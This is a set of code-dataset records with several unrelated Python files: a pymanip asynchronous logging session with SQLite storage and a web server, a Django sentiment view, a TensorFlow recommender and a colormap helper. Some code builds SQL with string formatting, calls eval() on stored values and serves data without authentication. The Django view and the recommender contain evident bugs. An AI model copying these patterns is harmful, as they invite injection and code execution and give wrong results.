self.qioptiq_zoom = Motor(Id + \":MOT_QIOPT_Z\")\n\n ### motors crystal ###\n #self.c_focus = Motor(Id + ':MOT_VT80')\n #self.c_rot = Motor(Id + ':MOT_ROT')\n\n def __repr__(self):\n s = \"**Detector and crystal positions**\\n\"\n motors = \"zaber_x qioptiq_zoom\".split()\n for motor in motors:\n s += \" - %s %.4f\\n\" % (motor, getattr(self, motor).wm())\n s += \"\\n\"\n\n return s\n\n\n\n","sub_path":"slic/devices/endstations/unused/bernina_europium.py","file_name":"bernina_europium.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"405475029","text":"\"\"\"\n\nThis module defines another kind of session, meant to be used for asynchronous\nmonitoring, where each variable can be logged with its own timestamp.\n\n\"\"\"\n\nimport signal\nimport time\nimport sys\nimport os.path\nimport pickle\nimport warnings\nfrom pprint import pprint\n\nimport sqlite3\nfrom datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.cbook import mplDeprecation as MatplotlibDeprecationWarning\n\nimport asyncio\nfrom aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\nimport tempfile\nimport smtplib\nfrom email.message import EmailMessage\nfrom clint.textui import colored\nimport requests\nimport json\n\ntry:\n import PyQt5.QtCore\nexcept ModuleNotFoundError:\n pass\n\nfrom pymanip.mytime import dateformat\n\n__all__ = [\"AsyncSession\"]\n\n\nclass AsyncSession:\n database_version = 3\n\n def __init__(self, session_name=None, verbose=True, delay_save=False):\n self.session_name = session_name\n self.custom_figures = None\n self.delay_save = delay_save\n if session_name is not None:\n session_name = str(session_name) # in case it is a Path object\n if session_name.endswith(\".db\"):\n session_name = session_name[:-3]\n elif delay_save:\n raise ValueError(\"Cannot delay_save if session_name is not specified\")\n if session_name is None or delay_save:\n # For no name session, or in case of delay_save=True, then\n # the connection is in-memory\n self.conn = sqlite3.connect(\":memory:\")\n else:\n # Otherwise, the connection is on the disk for immediate writing\n self.conn = sqlite3.connect(session_name + \".db\")\n if delay_save and os.path.exists(session_name + \".db\"):\n # Load existing database into in-memory database\n disk_db = sqlite3.connect(session_name + \".db\")\n try:\n with self.conn as c:\n for line in disk_db.iterdump():\n c.execute(line)\n finally:\n disk_db.close()\n with self.conn as c:\n tables = list(c.execute(\"SELECT name FROM sqlite_master;\"))\n 
if not tables:\n c.execute(\n \"\"\"\n CREATE TABLE log_names (\n name TEXT);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE log (\n timestamp INT,\n name TEXT,\n value REAL);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE dataset_names (\n name TEXT);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE dataset (\n timestamp INT,\n name TEXT,\n data BLOB);\n \"\"\"\n )\n c.execute(\n \"\"\"\n CREATE TABLE parameters (\n name TEXT,\n value REAL);\n \"\"\"\n )\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (\"_database_version\", AsyncSession.database_version),\n )\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (\"_session_creation_timestamp\", datetime.now().timestamp()),\n )\n elif verbose:\n self.print_welcome()\n self.figure_list = []\n self.template_dir = os.path.join(os.path.dirname(__file__), \"web\")\n self.static_dir = os.path.join(os.path.dirname(__file__), \"web_static\")\n self.jinja2_loader = jinja2.FileSystemLoader(self.template_dir)\n\n def save_database(self):\n \"\"\"\n If delay_save = True, the database is kept in-memory, and later\n saved to disk when this function is called.\n A new database file will be created with the content of the current\n in-memory database\n \"\"\"\n if self.delay_save:\n try:\n os.remove(self.session_name + \".db\")\n except FileNotFoundError:\n pass\n disk_db = sqlite3.connect(self.session_name + \".db\")\n try:\n with disk_db as c:\n for line in self.conn.iterdump():\n c.execute(line)\n finally:\n disk_db.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, type_, value, cb):\n self.save_database()\n self.conn.close()\n\n def get_version(self):\n version = self.parameter(\"_database_version\")\n if version is None:\n version = 1\n return version\n\n @property\n def t0(self):\n if hasattr(self, \"_session_creation_timestamp\"):\n return self._session_creation_timestamp\n t0 = self.parameter(\"_session_creation_timestamp\")\n if t0 is not None:\n self._session_creation_timestamp = t0\n return t0\n logged_data = self.logged_first_values()\n if logged_data:\n t0 = min([v[0] for k, v in logged_data.items()])\n self.save_parameter(_session_creation_timestamp=t0)\n self._session_creation_timestamp = t0\n return t0\n return 0\n\n @property\n def initial_timestamp(self):\n return self.t0\n\n @property\n def last_timestamp(self):\n ts = list()\n last_values = self.logged_last_values()\n if last_values:\n ts.append(max([t_v[0] for name, t_v in last_values.items()]))\n for ds_name in self.dataset_names():\n ts.append(max(self.dataset_times(ds_name)))\n if ts:\n return max(ts)\n return None\n\n def print_welcome(self):\n start_string = time.strftime(dateformat, time.localtime(self.initial_timestamp))\n print(colored.blue(\"*** Start date: \" + start_string))\n last = self.last_timestamp\n if last:\n end_string = time.strftime(dateformat, time.localtime(last))\n print(colored.blue(\"*** End date: \" + end_string))\n\n def add_entry(self, **kwargs):\n ts = datetime.now().timestamp()\n with self.conn as c:\n cursor = c.cursor()\n cursor.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in cursor.fetchall()])\n for key, val in kwargs.items():\n if key not in names:\n c.execute(\"INSERT INTO log_names VALUES (?);\", (key,))\n names.add(key)\n c.execute(\"INSERT INTO log VALUES (?,?,?);\", (ts, key, val))\n\n def add_dataset(self, **kwargs):\n ts = datetime.now().timestamp()\n with self.conn as c:\n cursor = c.cursor()\n 
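# Look up the names already registered so new ones are inserted only once.\n            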
cursor.execute(\"SELECT name FROM dataset_names;\")\n names = set([d[0] for d in cursor.fetchall()])\n for key, val in kwargs.items():\n if key not in names:\n c.execute(\"INSERT INTO dataset_names VALUES (?);\", (key,))\n names.add(key)\n c.execute(\n \"INSERT INTO dataset VALUES (?,?,?);\",\n (ts, key, pickle.dumps(val, protocol=4)),\n )\n\n def logged_variables(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n data = c.fetchall()\n names = set([d[0] for d in data])\n return names\n\n def logged_data(self):\n names = self.logged_variables()\n result = dict()\n for name in names:\n result[name] = self.__getitem__(name)\n return result\n\n def logged_first_values(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in c.fetchall()])\n result = dict()\n for name in names:\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}'\n ORDER BY timestamp ASC\n LIMIT 1;\n \"\"\".format(\n name\n )\n )\n result[name] = c.fetchone()\n return result\n\n def logged_last_values(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT name FROM log_names;\")\n names = set([d[0] for d in c.fetchall()])\n result = dict()\n for name in names:\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}'\n ORDER BY timestamp DESC\n LIMIT 1;\n \"\"\".format(\n name\n )\n )\n result[name] = c.fetchone()\n return result\n\n def logged_data_fromtimestamp(self, name, timestamp):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"SELECT timestamp, value FROM log\n WHERE name='{:}' AND timestamp > {:}\n ORDER BY timestamp ASC;\n \"\"\".format(\n name, timestamp\n )\n )\n data = c.fetchall()\n t = np.array([d[0] for d in data if d[1] is not None])\n v = np.array([d[1] for d in data if d[1] is not None])\n return t, v\n\n def dataset_names(self):\n with self.conn as conn:\n c = conn.cursor()\n try:\n c.execute(\"SELECT name from dataset_names;\")\n data = c.fetchall()\n except sqlite3.OperationalError:\n return set()\n return set([d[0] for d in data])\n\n def datasets(self, name):\n with self.conn as conn:\n c = conn.cursor()\n try:\n c.execute(\"SELECT name from dataset_names;\")\n data = c.fetchall()\n except sqlite3.OperationalError:\n data = set()\n names = set([d[0] for d in data])\n if name not in names:\n print(\"Possible dataset names are\", names)\n raise ValueError(f'Bad dataset name \"{name:}\"')\n it = c.execute(\n \"\"\"SELECT timestamp, data FROM dataset\n WHERE name='{:}'\n ORDER BY timestamp ASC;\n \"\"\".format(\n name\n )\n )\n for row in it:\n yield row[0], pickle.loads(row[1])\n\n def dataset_last_data(self, name):\n return next(self.datasets(name))\n\n def dataset_times(self, name):\n with self.conn as conn:\n c = conn.cursor()\n it = c.execute(\n \"\"\"SELECT timestamp FROM dataset\n WHERE name='{:}'\n ORDER BY timestamp ASC;\n \"\"\".format(\n name\n )\n )\n t = np.array([v[0] for v in it])\n return t\n\n def dataset(self, name, ts=None):\n if ts is None:\n ts, data = self.dataset_last_data(name)\n return data\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"SELECT data FROM dataset\n WHERE name='{:}' AND timestamp='{:}';\n \"\"\".format(\n name, ts\n )\n )\n data = pickle.loads(c.fetchone()[0])\n return data\n\n def save_parameter(self, **kwargs):\n with self.conn as conn:\n c = conn.cursor()\n for key, val in kwargs.items():\n c.execute(\n \"\"\"SELECT rowid FROM parameters\n WHERE name='{:}';\n 
\"\"\".format(\n key\n )\n )\n rowid = c.fetchone()\n if rowid is not None:\n rowid = rowid[0]\n c.execute(\n \"\"\"\n REPLACE INTO parameters\n (rowid, name, value)\n VALUES (?,?,?);\n \"\"\",\n (rowid, key, val),\n )\n else:\n c.execute(\n \"\"\"\n INSERT INTO parameters\n (name, value)\n VALUES (?,?);\n \"\"\",\n (key, val),\n )\n\n def parameter(self, name):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT value FROM parameters\n WHERE name='{:}';\n \"\"\".format(\n name\n )\n )\n data = c.fetchone()\n if data:\n return data[0]\n return None\n\n def has_parameter(self, name):\n return self.parameter(name) is not None\n\n def parameters(self):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\"SELECT * FROM parameters;\")\n data = c.fetchall()\n return {d[0]: d[1] for d in data}\n\n def __getitem__(self, key):\n with self.conn as conn:\n c = conn.cursor()\n c.execute(\n \"\"\"\n SELECT timestamp, value FROM log\n WHERE name='{:}';\n \"\"\".format(\n key\n )\n )\n data = c.fetchall()\n t = np.array([d[0] for d in data])\n v = np.array([d[1] for d in data])\n return t, v\n\n async def send_email(\n self,\n from_addr,\n to_addrs,\n host,\n port=25,\n subject=None,\n delay_hours=6,\n initial_delay_hours=None,\n ):\n \"\"\"\n Asynchronous task which sends an email every delay_hours hours.\n \"\"\"\n\n if self.session_name is None:\n title = \"Pymanip session\"\n else:\n title = self.session_name\n if subject is None:\n subject = title\n\n if initial_delay_hours is None:\n initial_delay_hours = delay_hours / 2\n\n if initial_delay_hours > 0:\n await self.sleep(initial_delay_hours * 3600, verbose=False)\n\n jinja2_autoescape = jinja2.select_autoescape([\"html\"])\n jinja2_env = jinja2.Environment(\n loader=self.jinja2_loader, autoescape=jinja2_autoescape\n )\n template = jinja2_env.get_template(\"email.html\")\n\n while self.running:\n\n dt_n = datetime.now()\n dt_fmt = \"{:}{:02d}{:02d}-{:02d}{:02d}{:02d}\"\n datestr = dt_fmt.format(\n dt_n.year, dt_n.month, dt_n.day, dt_n.hour, dt_n.minute, dt_n.second\n )\n # Generate HTML content\n last_values = self.logged_last_values()\n for name in last_values:\n timestamp, value = last_values[name]\n last_values[name] = (\n timestamp,\n value,\n time.strftime(dateformat, time.localtime(timestamp)),\n )\n n_figs = len(self.figure_list)\n message_html = template.render(\n title=title,\n fignums=range(n_figs),\n datestr=datestr,\n last_values=last_values,\n )\n\n # Create Email message\n msg = EmailMessage()\n msg[\"Subject\"] = subject\n msg[\"From\"] = from_addr\n msg[\"To\"] = to_addrs\n msg.set_content(\"This is a MIME message\")\n msg.add_alternative(message_html, subtype=\"html\")\n\n # Add figure images\n for fignum, fig in enumerate(self.figure_list):\n fd, fname = tempfile.mkstemp(suffix=\".png\")\n with os.fdopen(fd, \"wb\") as f_png:\n fig.canvas.draw_idle()\n fig.savefig(f_png)\n with open(fname, \"rb\") as image_file:\n figure_data = image_file.read()\n os.remove(fname)\n p = msg.get_payload()[1]\n p.add_related(\n figure_data,\n maintype=\"image\",\n subtype=\"png\",\n cid=\"{:d}{:}\".format(fignum, datestr),\n filename=\"fig{:d}-{:}.png\".format(fignum, datestr),\n )\n\n with smtplib.SMTP(host, port) as smtp:\n try:\n smtp.send_message(msg)\n print(\"Email sent!\")\n except smtplib.SMTPHeloError:\n print(\"SMTP Helo Error\")\n except smtplib.SMTPRecipientsRefused:\n print(\"Some recipients have been rejected by SMTP server\")\n except smtplib.SMTPSenderRefused:\n print(\"SMTP server refused sender \" + 
self.email_from_addr)\n except smtplib.SMTPDataError:\n print(\"SMTP Data Error\")\n\n await self.sleep(delay_hours * 3600, verbose=False)\n\n async def plot(\n self,\n varnames=None,\n maxvalues=1000,\n yscale=None,\n *,\n x=None,\n y=None,\n fixed_ylim=None,\n fixed_xlim=None,\n ):\n \"\"\"\n if x, y is specified instead of varnames, plot var y against var x\n \"\"\"\n if varnames is None:\n if not isinstance(x, str) or not isinstance(y, str):\n raise TypeError(\"x and y should be strings\")\n varnames = (x, y)\n param_key_window = \"_window_xy_\" + \"_\".join(varnames)\n param_key_figsize = \"_figsize_xy_\" + \"_\".join(varnames)\n xymode = True\n else:\n if x is not None or y is not None:\n raise ValueError(\"Cannot specify both varnames and (x,y)\")\n if isinstance(varnames, str):\n varnames = (varnames,)\n param_key_window = \"_window_\" + \"_\".join(varnames)\n param_key_figsize = \"_figsize_\" + \"_\".join(varnames)\n xymode = False\n last_update = {k: 0 for k in varnames}\n saved_geom = self.parameter(param_key_window)\n if saved_geom:\n saved_geom = eval(saved_geom)\n saved_figsize = self.parameter(param_key_figsize)\n if saved_figsize:\n saved_figsize = eval(saved_figsize)\n plt.ion()\n fig = plt.figure(figsize=saved_figsize)\n mngr = fig.canvas.manager\n if saved_geom:\n mngr.window.setGeometry(saved_geom)\n ax = fig.add_subplot(111)\n line_objects = dict()\n self.figure_list.append(fig)\n ts0 = self.initial_timestamp\n while self.running:\n data = {\n k: self.logged_data_fromtimestamp(k, last_update[k]) for k in varnames\n }\n if xymode:\n ts_x, vs_x = data[x]\n ts_y, vs_y = data[y]\n if (ts_x != ts_y).any():\n raise ValueError(\n \"xymode can only be used if x and y are synchronous\"\n )\n if ts_x.size > 0:\n if y in line_objects:\n p = line_objects[y]\n xx = np.hstack((p.get_xdata(), vs_x))\n yy = np.hstack((p.get_ydata(), vs_y))\n p.set_xdata(xx)\n p.set_ydata(yy)\n if fixed_xlim is None:\n xlim = ax.get_xlim()\n if xlim[1] < np.max(xx) or xlim[0] > np.min(xx):\n ax.set_xlim((np.min(xx), np.max(xx)))\n if fixed_ylim is None:\n ylim = ax.get_ylim()\n if ylim[1] < np.max(yy) or ylim[0] > np.min(yy):\n ax.set_ylim((np.min(yy), np.max(yy)))\n else:\n p, = ax.plot(vs_x, vs_y, \"s-\")\n line_objects[y] = p\n ax.set_xlabel(x)\n ax.set_ylabel(y)\n if fixed_xlim is None:\n if np.min(vs_x) != np.max(vs_x):\n ax.set_xlim((np.min(vs_x), np.max(vs_x)))\n else:\n ax.set_xlim(fixed_xlim)\n if fixed_ylim is None:\n if np.min(vs_y) != np.max(vs_y):\n ax.set_ylim((np.min(vs_y), np.max(vs_y)))\n else:\n ax.set_ylim(fixed_ylim)\n fig.show()\n last_update[x] = ts_x[-1]\n last_update[y] = ts_y[-1]\n else:\n for name, values in data.items():\n ts, vs = values\n if ts.size > 0:\n if name in line_objects:\n # print('updating plot')\n p = line_objects[name]\n x = np.hstack((p.get_xdata(), (ts - ts0) / 3600))\n y = np.hstack((p.get_ydata(), vs))\n if x.size > maxvalues:\n x = x[-maxvalues:]\n y = y[-maxvalues:]\n p.set_xdata(x)\n p.set_ydata(y)\n if x[0] != x[-1]:\n ax.set_xlim((x[0], x[-1]))\n if fixed_ylim is None:\n ylim = ax.get_ylim()\n if ylim[1] < np.max(y) or ylim[0] > np.min(y):\n ylim = (\n min((ylim[0], np.min(y))),\n max((ylim[1], np.max(y))),\n )\n ax.set_ylim(ylim)\n else:\n # print('initial plot')\n x = (ts - ts0) / 3600\n y = vs\n if x.size > maxvalues:\n x = x[-maxvalues:]\n y = y[-maxvalues:]\n p, = ax.plot(x, y, \"o-\", label=name)\n line_objects[name] = p\n ax.set_xlabel(\"t [h]\")\n if x[0] != x[-1]:\n ax.set_xlim((x[0], x[-1]))\n if yscale:\n ax.set_yscale(yscale)\n if 
fixed_ylim is not None:\n ax.set_ylim(fixed_ylim)\n ax.legend()\n fig.show()\n last_update[name] = ts[-1]\n await asyncio.sleep(1)\n\n # Saving figure positions\n try:\n geom = mngr.window.geometry()\n figsize = tuple(fig.get_size_inches())\n self.save_parameter(\n **{param_key_window: str(geom), param_key_figsize: str(figsize)}\n )\n except AttributeError:\n pass\n\n async def figure_gui_update(self):\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=MatplotlibDeprecationWarning)\n while self.running:\n figure_list = self.figure_list\n if self.custom_figures:\n figure_list = figure_list + self.custom_figures\n if figure_list:\n for fig in self.figure_list:\n fig.canvas.start_event_loop(0.7 / len(self.figure_list))\n await asyncio.sleep(0.3 / len(self.figure_list))\n await asyncio.sleep(0.05)\n else:\n await asyncio.sleep(1.0)\n\n def ask_exit(self, *args, **kwargs):\n self.running = False\n print(\" Signal caught... stopping...\")\n\n async def sweep(self, task, iterable):\n # expects task of the format\n # async def balayage(sesn, voltage):\n # do something with voltage\n for val in iterable:\n await task(self, val)\n if not self.running:\n break\n self.running = False\n\n async def sleep(self, duration, verbose=True):\n start = time.monotonic()\n while self.running and time.monotonic() - start < duration:\n if verbose:\n print(\n \"Sleeping for \"\n + str(-int(time.monotonic() - start - duration))\n + \" s\"\n + \" \" * 8,\n end=\"\\r\",\n )\n sys.stdout.flush()\n await asyncio.sleep(0.5)\n if verbose:\n sys.stdout.write(\"\\n\")\n\n async def server_main_page(self, request):\n print(\"[\", datetime.now(), request.remote, request.rel_url, \"]\")\n if self.session_name:\n context = {\"title\": self.session_name}\n else:\n context = {\"title\": \"pymanip\"}\n response = aiohttp_jinja2.render_template(\"main.html\", request, context)\n return response\n\n async def server_logged_last_values(self, request):\n data = [\n {\n \"name\": name,\n \"value\": v[1],\n \"datestr\": time.strftime(dateformat, time.localtime(v[0])),\n }\n for name, v in self.logged_last_values().items()\n ]\n return web.json_response(data)\n\n async def server_get_parameters(self, request):\n params = {k: v for k, v in self.parameters().items() if not k.startswith(\"_\")}\n return web.json_response(params)\n\n async def server_plot_page(self, request):\n print(\"[\", datetime.now(), request.remote, request.rel_url, \"]\")\n context = {\"name\": request.match_info[\"name\"]}\n response = aiohttp_jinja2.render_template(\"plot.html\", request, context)\n return response\n\n async def server_data_from_ts(self, request):\n data_in = await request.json()\n last_ts = data_in[\"last_ts\"]\n name = data_in[\"name\"]\n timestamps, values = self.logged_data_fromtimestamp(name, last_ts)\n data_out = list(zip(timestamps, values))\n # print('from', last_ts, data_out)\n return web.json_response(data_out)\n\n async def server_current_ts(self, request):\n return web.json_response({\"now\": datetime.now().timestamp()})\n\n async def mytask(self, corofunc):\n print(\"Starting task\", corofunc)\n while self.running:\n await corofunc(self)\n print(\"Task finished\", corofunc)\n\n def run(self, *tasks, server_port=6913, custom_routes=None, custom_figures=None):\n loop = asyncio.get_event_loop()\n self.custom_figures = custom_figures\n\n # signal handling\n self.running = True\n if sys.platform == \"win32\":\n # loop.add_signal_handler raises NotImplementedError\n signal.signal(signal.SIGINT, self.ask_exit)\n 
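# POSIX event loops can register the signal handlers directly.\n        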
else:\n for signame in (\"SIGINT\", \"SIGTERM\"):\n loop.add_signal_handler(getattr(signal, signame), self.ask_exit)\n\n # web server\n if server_port:\n app = web.Application(loop=loop)\n aiohttp_jinja2.setup(app, loader=self.jinja2_loader)\n app.router.add_routes(\n [\n web.get(\"/\", self.server_main_page),\n web.get(\"/api/logged_last_values\", self.server_logged_last_values),\n web.get(\"/plot/{name}\", self.server_plot_page),\n web.static(\"/static\", self.static_dir),\n web.post(\"/api/data_from_ts\", self.server_data_from_ts),\n web.get(\"/api/server_current_ts\", self.server_current_ts),\n web.get(\"/api/get_parameters\", self.server_get_parameters),\n ]\n )\n if custom_routes:\n app.router.add_routes(custom_routes)\n\n webserver = loop.create_server(\n app.make_handler(), host=None, port=server_port\n )\n\n # if any of the tasks submitted are coroutinefunctions instead of\n # coroutines, then assume they take only one argument (self)\n tasks_final = list()\n for t in tasks:\n if asyncio.iscoroutinefunction(t):\n tasks_final.append(self.mytask(t))\n elif asyncio.iscoroutine(t):\n tasks_final.append(t)\n else:\n raise TypeError(\"Coroutine or Coroutinefunction is expected\")\n print(\"Starting event loop\")\n if server_port:\n loop.run_until_complete(\n asyncio.gather(webserver, self.figure_gui_update(), *tasks_final)\n )\n else:\n loop.run_until_complete(\n asyncio.gather(self.figure_gui_update(), *tasks_final)\n )\n\n def save_remote_data(self, data):\n \"\"\"\n Save data from RemoteObserver object as datasets and parameters\n \"\"\"\n for k, v in data.items():\n # print(k,type(v),v)\n try:\n v[0]\n iterable = True\n except (TypeError, KeyError):\n iterable = False\n if iterable:\n # we are iterable\n self.add_dataset(**{k: v})\n else:\n # we are not iterable\n if isinstance(v, dict):\n # non reduced data, v is a dictionnary with two keys, 't' and 'value'\n self.add_dataset(**{k: v[\"value\"]})\n self.add_dataset(**{k + \"_time\": v[\"t\"]})\n else:\n try:\n # data must be a scalar\n float(v)\n except TypeError:\n print(\"skipping\", k, type(v))\n continue\n self.save_parameter(**{k: v})\n\n\nclass RemoteObserver:\n \"\"\"\n Remote observation of a running async session\n \"\"\"\n\n def __init__(self, host, port=6913):\n self.host = host\n self.port = port\n\n def _get_request(self, apiname):\n url = \"http://{host:}:{port:}/api/{api:}\".format(\n host=self.host, port=self.port, api=apiname\n )\n r = requests.get(url)\n try:\n return r.json()\n except json.decoder.JSONDecodeError:\n print(r.text)\n raise\n\n def _post_request(self, apiname, params):\n url = \"http://{host:}:{port:}/api/{api:}\".format(\n host=self.host, port=self.port, api=apiname\n )\n r = requests.post(url, json=params)\n try:\n return r.json()\n except json.decoder.JSONDecodeError:\n print(r.text)\n raise\n\n def get_last_values(self):\n \"\"\"\n Client function to grab the last set of values from\n a remote running async session\n \"\"\"\n\n data = self._get_request(\"logged_last_values\")\n return {d[\"name\"]: d[\"value\"] for d in data}\n\n def start_recording(self):\n self.server_ts_start = self._get_request(\"server_current_ts\")[\"now\"]\n data = self.get_last_values()\n self.remote_varnames = list(data.keys())\n\n def stop_recording(self, reduce_time=True, force_reduce_time=True):\n recordings = dict()\n for varname in self.remote_varnames:\n data = self._post_request(\n \"data_from_ts\",\n params={\"name\": varname, \"last_ts\": self.server_ts_start},\n )\n if len(data) > 0:\n recordings[varname] = 
{\n \"t\": [d[0] for d in data],\n \"value\": [d[1] for d in data],\n }\n if reduce_time:\n t = recordings[self.remote_varnames[0]][\"t\"]\n if (\n all([recordings[varname][\"t\"] == t for varname in recordings])\n or force_reduce_time\n ):\n recordings = {k: v[\"value\"] for k, v in recordings.items()}\n recordings[\"time\"] = t\n else:\n print(\"t =\", t)\n pprint(\n {\n varname: recordings[varname][\"t\"] == t\n for varname in self.remote_varnames\n }\n )\n parameters = self._get_request(\"get_parameters\")\n recordings.update(parameters)\n\n return recordings\n\n\nif __name__ == \"__main__\":\n with AsyncSession(\"Essai\") as sesn:\n sesn.add_entry(a=1, b=2)\n sesn.save_parameter(c=3)\n sesn.plot(\"a\")\n","sub_path":"pymanip/asyncsession.py","file_name":"asyncsession.py","file_ext":"py","file_size_in_byte":33682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"211413670","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom .models import Phone, PhoneCPages, PhoneCDetails\nfrom django.db.models import Avg\n\ndef phone_comments(request):\n ### 从models取数据传给template ###\n comments = PhoneCDetails.objects.all()\n # 评论数量\n counter = PhoneCDetails.objects.all().count()\n\n # 情感倾向\n sent_avg =f\" {PhoneCDetails.objects.aggregate(Avg('comment_sentiments'))['sentiment__avg']:0.2f} \"\n\n # 正向数量\n queryset = PhoneCDetails.objects.values('comment_sentiments')\n condtions = {'sentiment__gte': 0.5}\n plus = queryset.filter(**condtions).count()\n\n # 负向数量\n queryset = PhoneCDetails.objects.values('comment_sentiments')\n condtions = {'sentiment__lt': 0.5}\n minus = queryset.filter(**condtions).count()\n\n\n return render(request, 'result.html', locals())","sub_path":"week10/PCDjango/djcron/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"494485871","text":"from __future__ import print_function\nimport tensorflow as tf \nimport numpy as np \nimport cPickle\nfrom tensorflow.contrib import slim\n\n#Load features and labels\nfeatures = cPickle.load(open('nn_features.p', 'rb'))\nval_features = cPickle.load(open('nn_val_features.p', 'rb'))\nlabels = cPickle.load(open('labels.p', 'rb'))\n\n#to normalize submatrix which is not sparse\nl = [i for i in range(143, features.shape[1])]\nmu = np.mean(features, axis=0)\nstd = np.mean(features, axis=0)\nfeatures[:,l] = (features[:,l] - mu[l]) / std[l]\nval_features[:,l] = (val_features[:,l] - mu[l]) / std[l]\n\n\nmask = np.random.choice(features.shape[0], features.shape[0], replace=False)\nfeatures = features[mask]\nlabels = labels[mask]\n\npositive_mask = []\nnegative_mask = []\nfor i in range(labels.shape[0]):\n\tif np.array_equal(labels[i], [0,1]):\n\t\tpositive_mask.append(i)\n\telse:\n\t\tnegative_mask.append(i)\npos_features = features[positive_mask]\npos_labels = labels[positive_mask]\nneg_features = features[negative_mask]\nneg_labels = labels[negative_mask]\n\n#change these values later\nlearning_rate = 0.001\ntraining_epochs = 700\ndisplay_step = 1\nin_dim = features.shape[1]\nn_samples = features.shape[0]\nbatch_size = 128\nnum_features = features.shape[1]\nnum_classes = labels.shape[1]\nn_hidden1 = 256\nn_hidden2 = 256\nn_hidden3 = 256\nreg_strength = 5e-4\ndropout_rate = 0.5\n\n#define placeholder for our input\nX = tf.placeholder(\"float\", [None, num_features])\nY = tf.placeholder(\"float\", [None, num_classes])\n#drop_p = 
tf.placeholder(tf.float32)\n\ndef model(x):\n layer = slim.fully_connected(x,n_hidden1, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden1')\n layer = slim.batch_norm(layer, scope='bn1')\n layer = slim.dropout(layer, dropout_rate, scope='dropout1')\n layer = slim.fully_connected(layer,n_hidden2, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden2')\n layer = slim.batch_norm(layer, scope='bn2')\n layer = slim.dropout(layer, dropout_rate, scope='dropout2')\n layer = slim.fully_connected(layer,n_hidden3, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='hidden3')\n out_layer = slim.fully_connected(layer,num_classes, activation_fn=None, weights_initializer=tf.truncated_normal_initializer(stddev=0.01),\n weights_regularizer=slim.l2_regularizer(reg_strength),scope='out_layer')\n return out_layer\n\nrecommendor = model(X)\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(recommendor, Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n\nprobabilities = tf.nn.softmax(recommendor)\n\n# Initializing the variables\ninit = tf.initialize_all_variables()\n\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n # Training cycle\n for epoch in range(training_epochs):\n avg_loss = 0.\n total_batch = int(features.shape[0]/batch_size)\n # Loop over all batches\n start = 0\n end = batch_size\n for i in range(total_batch):\n #batch_x, batch_y = features[start:end], labels[start:end]\n pos_mask = np.random.choice(pos_features.shape[0], batch_size/2, replace=False)\n neg_mask = np.random.choice(neg_features.shape[0], batch_size/2, replace=False)\n batch_x = np.vstack((pos_features[pos_mask], neg_features[neg_mask]))\n batch_y = np.vstack((pos_labels[pos_mask], neg_labels[neg_mask]))\n shuffle = np.random.choice(batch_x.shape[0], batch_x.shape[0], replace=False)\n batch_x = batch_x[shuffle]\n batch_y = batch_y[shuffle]\n # Run optimization op (backprop) and loss op (to get loss value)\n _, c = sess.run([optimizer, loss], feed_dict={X: batch_x,\n Y: batch_y})\n # Compute average loss\n avg_loss += c / total_batch\n start = end\n end += batch_size\n # Display logs per epoch step\n if epoch % display_step == 0:\n print(\"Epoch:\", '%04d' % (epoch+1), \"loss=\", \\\n \"{:.9f}\".format(avg_loss))\n print(\"Optimization Finished!\")\n probs = sess.run(probabilities, feed_dict={X: val_features})\n\nprint('Probabilies: ', probs[:,1])\nf = open('validate_nolabel.txt', 'r')\nheader = f.readline()\ncontent = f.readlines()\nf.close()\nf = open('nn_val_res.txt', 'w')\nf.write(header + '\\n')\nfor i in range(len(content)):\n\tdata = content[i].replace('\\n', '').replace('\\r', '')\n\tdata += ',' + str(probs[i,1]) + '\\n'\n\tf.write(data)\nf.close()","sub_path":"code/neural_recommendation.py","file_name":"neural_recommendation.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"543312675","text":"import numpy as np\n\n\n\ndef create_pascal_label_colormap():\n \"\"\"Creates a label colormap used in PASCAL VOC segmentation benchmark.\n\n Returns:\n A Colormap for visualizing segmentation results.\n \"\"\"\n colormap = np.zeros((256, 3), dtype=int)\n ind = np.arange(256, dtype=int)\n\n for shift in reversed(range(8)):\n for channel 
